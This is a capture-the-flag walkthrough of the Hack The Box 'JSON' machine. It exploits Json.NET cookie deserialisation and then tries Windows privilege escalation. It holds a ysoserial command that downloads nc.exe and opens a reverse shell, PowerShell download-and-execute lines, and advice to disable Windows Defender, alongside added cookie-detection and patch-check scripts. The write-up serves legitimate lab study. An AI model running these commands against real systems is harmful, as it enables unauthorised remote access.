Hack The Box: JSON Walkthrough
Author: 130n@calvinlai.com
27 Nov 2019
This box could not have been completed without the support of our friends at CTF Playgroup Hong Kong & Macau.
Get the user.txt and root.txt
Target machine: 10.10.10.158
Attacking (Hacker) machine: 10.10.14.18
The target machine IP is 10.10.10.158. Get a basic understanding of the services exposed by the target with a full-port nmap sweep, then run a version/script scan (-A) against the open ports.
0.1) Quick sweep of all TCP ports
nmap -p- 10.10.10.158
0.2) Detailed analysis of the open ports
nmap -sV -p 21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,49158 -A -oN nmap-htb-json-details.txt 10.10.10.158
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Enumeration strategies
Nikto: nothing that could be abused to bypass authentication.
dirb and gobuster: no hidden files or folders useful for exploitation.
FTP (21/tcp): anonymous login is not allowed.
Visit the web page
The site uses JSON for authorisation.
Index.html
After a few tries the login credentials were found to be admin/admin.
The cookie value set after login is base64-encoded JSON (shown truncated):
eyJJZCI6MSwiVXNlck5hbWUiOiJhZG…Sb2wiOiJBZG1pbmlzdHJhdG9yIn0=
Decoded:
{
  "Id": 1,
  "UserName": "admin",
  "Password": "21232f297a57a5a743894a0e4a801fc3",
  "Name": "User Admin HTB",
  "Rol": "Administrator"
}
The Password field is an unsalted MD5 digest: 21232f297a57a5a743894a0e4a801fc3 is MD5("admin").
Log in to the website and replace the cookie value with the generated payload.
As the machine name implies, the weakness is in how the server handles JSON: the OAuth2 cookie (not an OAuth2 token, despite its name) is base64-encoded JSON that the server deserialises with Json.NET with type-name handling enabled, so a ysoserial.net payload built with the Json.Net formatter can be supplied as the cookie value and its command runs during deserialisation.
Download ysoserial.net (master-release-29.zip from its releases page) and unzip it.
Switch off Windows Defender first; it flags ysoserial.exe.
Check where a file can be written on the target. C:\windows\system32\spool\drivers\color is writable by unprivileged users on default Windows installs, which is why it is used as the staging directory below.
ysoserial.exe -f Json.Net -g WindowsIdentity -o base64 -c "certutil.exe -urlcache -split -f "http://10.10.15.158:8888/nc.exe" "C:\windows\system32\spool\drivers\color\nc.exe"&"C:\windows\system32\spool\drivers\color\nc.exe" 10.10.15.158 1234 -e cmd.exe"
The command fetches nc.exe with certutil and then runs it as a reverse shell. Note that the attacker address in this command (10.10.15.158) differs from the 10.10.14.18 used elsewhere in this walkthrough; substitute your own VPN (tun0) address and the port your netcat listener is on.
C) Prepare the netcat listener and the HTTP server from which the target downloads nc.exe
Serve nc.exe over HTTP on port 8888 and start a netcat listener on port 1234, matching the address and port in the ysoserial command.
3.1) Log in to the website and exploit to get low-privilege access
Replace the OAuth2 cookie value with the generated payload and refresh the page; the target fetches nc.exe and connects back to the listener.
Run systeminfo and save the output for later evaluation.
Locate user.txt with dir user.txt /s /p.
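The cookie handling above, as an added Python example that is not part of the original walkthrough or of ysoserial.net: it base64-decodes the OAuth2 cookie, confirms the Password field is an unsalted MD5 of a guessed password, builds the Cookie header used when swapping in a crafted value, and, for the defensive side, scans a decoded cookie for Json.NET "$type" discriminators, which a type-name-handling gadget needs and a legitimate session object never contains. The real token on the page is truncated, so SAMPLE_TOKEN is rebuilt from the decoded JSON shown; FAKE_GADGET_B64 is a constructed stand-in for ysoserial output with the same outer shape and no real gadget chain; the cookie name OAuth2 is from the page, and the URL passed to send_with_cookie is the caller's assumption.

```python
import base64
import hashlib
import json
import urllib.request
from typing import Any, Dict, List

# Constructed sample: the page shows the real token only truncated, so this
# cookie value is rebuilt from the decoded JSON the page prints.
SAMPLE_TOKEN = base64.b64encode(json.dumps({
    "Id": 1,
    "UserName": "admin",
    "Password": "21232f297a57a5a743894a0e4a801fc3",
    "Name": "User Admin HTB",
    "Rol": "Administrator",
}).encode()).decode()

# Constructed stand-in for "ysoserial.exe -f Json.Net -g WindowsIdentity -o base64"
# output. The real payload carries a serialised object graph in the actor
# field; only the outer shape (an object whose "$type" names a .NET type) is
# reproduced here, so this is NOT a working gadget.
FAKE_GADGET_B64 = base64.b64encode(json.dumps({
    "$type": "System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, "
             "Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "System.Security.ClaimsIdentity.actor": "<serialised-object-graph-omitted>",
}).encode()).decode()


def decode_oauth2_cookie(token: str) -> Any:
    """Base64-decode the OAuth2 cookie value and parse the JSON inside it.
    Missing '=' padding (browsers sometimes strip it) is restored first."""
    padded = token + "=" * (-len(token) % 4)
    return json.loads(base64.b64decode(padded))


def password_is_md5_of(session: Dict[str, Any], guess: str) -> bool:
    """The Password field is an unsalted MD5 hex digest; test a candidate."""
    digest = hashlib.md5(guess.encode()).hexdigest()
    return str(session.get("Password", "")).lower() == digest


def find_type_discriminators(node: Any) -> List[str]:
    """Return every '$type' value anywhere in a JSON document.

    '$type' is the Json.NET type-name discriminator honoured when
    TypeNameHandling is enabled; a genuine session object has none, so any
    hit in client-supplied data is the fingerprint of a deserialisation payload."""
    hits: List[str] = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "$type" and isinstance(value, str):
                hits.append(value)
            hits.extend(find_type_discriminators(value))
    elif isinstance(node, list):
        for item in node:
            hits.extend(find_type_discriminators(item))
    return hits


def is_suspicious_cookie(token: str) -> bool:
    """Detection-side check: does this cookie value carry a '$type' key?"""
    try:
        decoded = decode_oauth2_cookie(token)
    except ValueError:  # not base64, not UTF-8 or not JSON: not this format at all
        return False
    return bool(find_type_discriminators(decoded))


def cookie_header(token: str) -> str:
    """Cookie header for a request; the cookie name OAuth2 is from the page."""
    return f"OAuth2={token}"


def send_with_cookie(url: str, token: str, timeout: float = 10.0) -> int:
    """GET the page with the crafted cookie, as the 'update the cookie and
    refresh' step does in the browser, and return the HTTP status.
    Network-only (raises urllib.error.HTTPError on 4xx/5xx); not run offline."""
    req = urllib.request.Request(url, headers={"Cookie": cookie_header(token)})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    session = decode_oauth2_cookie(SAMPLE_TOKEN)
    print("decoded:", session)
    print("Password == md5('admin'):", password_is_md5_of(session, "admin"))
    print("real session carries $type:", is_suspicious_cookie(SAMPLE_TOKEN))
    print("gadget-shaped cookie carries $type:", is_suspicious_cookie(FAKE_GADGET_B64))
    print("header:", cookie_header(FAKE_GADGET_B64)[:60] + "...")
```

The `$type` scan is the same heuristic a WAF rule or a log search would use: after base64-decoding the cookie, any `$type` key is enough to flag it, because the legitimate session object only ever has the five fields shown above.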
4.1) Sherlock to find vulnerabilities on the system
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
Sherlock reported MS16-135 as a candidate; the exploit-db entry used was:
https://www.exploit-db.com/exploits/40823
Download the compiled exploit to the target (the same writable staging directory as before):
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/ASLRSideChannelAttack.exe' -OutFile 'C:\windows\system32\spool\drivers\color\ASLRSideChannelAttack.exe'"
Executing ASLRSideChannelAttack.exe did not work on this host.
4.2) Using Windows-Exploit-Suggester to find vulnerabilities on the system
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Save the systeminfo output to a file and run the python script against it (after updating its bulletin database) to list the bulletins the host is missing.
The host was found to have several candidate bulletins/CVEs.
MS16-098 was picked from the list to try; download the compiled exploit from exploit-db.
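What Windows-Exploit-Suggester does with the saved systeminfo output, as an added Python example (my own code, not the project's): parse the OS name, architecture and installed hotfix list out of systeminfo text, then classify each bulletin as missing, patched or not applicable to the product. The systeminfo excerpt is constructed, and BULLETINS is a tiny illustrative subset whose KB numbers are quoted from memory (an assumption; the authoritative mapping is the MSSB spreadsheet the real tool downloads), so the output demonstrates the method rather than this host's actual patch level.

```python
import re
from typing import Any, Dict, List, Set

# Constructed systeminfo excerpt (not the page's real output), in the layout
# the systeminfo command prints. Hotfix lines are indented "[nn]: KBxxxxxxx".
SAMPLE_SYSTEMINFO = """\
Host Name:                 JSON
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3139914
Network Card(s):           1 NIC(s) Installed.
"""

# Illustrative bulletin table. ASSUMPTION: KB numbers and product lists are
# from memory and deliberately incomplete; superseding cumulative rollups are
# not modelled here, whereas the real tool has supersedence data.
BULLETINS: Dict[str, Dict[str, Any]] = {
    "MS16-098": {"title": "win32k.sys kernel-mode driver EoP",
                 "products": ("Server 2012 R2", "Windows 8.1"),
                 "kbs": {"KB3177725"}},
    "MS16-135": {"title": "win32k.sys NtSetWindowLongPtr EoP",
                 "products": ("Server 2012 R2", "Windows 8.1", "Windows 10"),
                 "kbs": {"KB3197873", "KB3197874"}},
    "MS16-032": {"title": "Secondary Logon EoP",
                 "products": ("Server 2012 R2", "Windows 8.1", "Windows 7"),
                 "kbs": {"KB3139914"}},
    "MS10-015": {"title": "KiTrap0D EoP",
                 "products": ("Windows 7", "Server 2008", "Windows Vista"),
                 "kbs": {"KB977165"}},
}


def parse_systeminfo(text: str) -> Dict[str, Any]:
    """Pull the fields a patch-level check needs out of systeminfo output."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        # "Key:   value" lines start in column 0; continuation lines are indented
        m = re.match(r"^(\S[^:]*?):\s+(.*\S)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    hotfixes: Set[str] = {
        kb.upper() for kb in re.findall(r"\[\d+\]:\s*(KB\d+)", text, re.IGNORECASE)
    }
    arch = re.search(r"(x64|x86|ARM64)-based", fields.get("System Type", ""), re.IGNORECASE)
    return {
        "os_name": fields.get("OS Name", ""),
        "os_version": fields.get("OS Version", ""),
        "arch": arch.group(1).lower() if arch else "unknown",
        "hotfixes": hotfixes,
    }


def bulletin_status(info: Dict[str, Any], bulletins: Dict[str, Dict[str, Any]]) -> Dict[str, str]:
    """Classify each bulletin for this host: 'n/a' (product not affected),
    'patched' (one of its KBs is installed) or 'missing'."""
    os_name = info["os_name"].lower()
    status: Dict[str, str] = {}
    for bid, b in bulletins.items():
        if not any(p.lower() in os_name for p in b["products"]):
            status[bid] = "n/a"
        elif info["hotfixes"] & b["kbs"]:
            status[bid] = "patched"
        else:
            status[bid] = "missing"
    return status


def missing_bulletins(info: Dict[str, Any], bulletins: Dict[str, Dict[str, Any]]) -> List[str]:
    """Sorted list of applicable bulletins with no fix installed."""
    return sorted(b for b, s in bulletin_status(info, bulletins).items() if s == "missing")


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{info['os_name']} ({info['arch']}), {len(info['hotfixes'])} hotfixes installed")
    for bid, state in sorted(bulletin_status(info, BULLETINS).items()):
        print(f"  {bid}: {state:8} {BULLETINS[bid]['title']}")
```

Two caveats carry over to the real tool: a host that installed a later monthly rollup still shows the original KB as absent unless supersedence is tracked, so "missing" means "worth trying", not "confirmed vulnerable" (MS16-135 above did not work even though it was flagged); and systeminfo only lists the hotfixes the servicing stack reports, so cross-check the list with wmic qfe when results look thin.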
References
Ysoserial.net: https://github.com/pwntester/ysoserial.net
Sherlock: https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1
Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Optimum (10.10.10.8) HackTheBox walkthrough: https://medium.com/soulsecteam/optimum-10-10-10-8-hackthebox-29f8d58da88f